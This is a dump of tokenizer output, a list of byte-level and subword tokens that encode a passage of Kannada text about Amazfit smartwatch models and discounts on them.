'<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x95>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xAD>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', 
'<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x87>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '<0xE0>', '<0xB2>', '<0xA3>', '<0xE0>', '<0xB2>', '<0x95>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xB9>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA7>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAA>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9A>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', 'ರ', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '<0xE0>', '<0xB2>', '<0x9A>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x8E>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xA6>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', 
'\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAD>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA6>', '▁', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x81>', 'ರ', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0x97>', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAD>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9C>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '<0x0A>', '<0xE0>', '<0xB2>', '<0xB9>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x81>', ',', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', 
'\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x81>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x96>', 'ರ', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x89>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xAE>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x82>', '▁', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xAA>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', 
'್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA6>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x8E>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '▁', '2', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', ',', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAA>', '್', 'ರ', '<0xE0>', '<0xB3>', '<0x8A>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x98>', '<0xE0>', '<0xB3>', '<0x8B>', '<0xE0>', '<0xB2>', '<0xB7>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xB9>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA6>', '್', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBE>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x8A>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', 
'<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0x88>', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0x96>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x93>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBF>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '.', '<0x0A>', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB6>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0x97>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '▁', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x87>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xB5>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '▁', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA7>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x83>', '<0xE0>', '<0xB2>', '<0xA4>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAC>', '್', '▁', 
'<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '\\u200c', 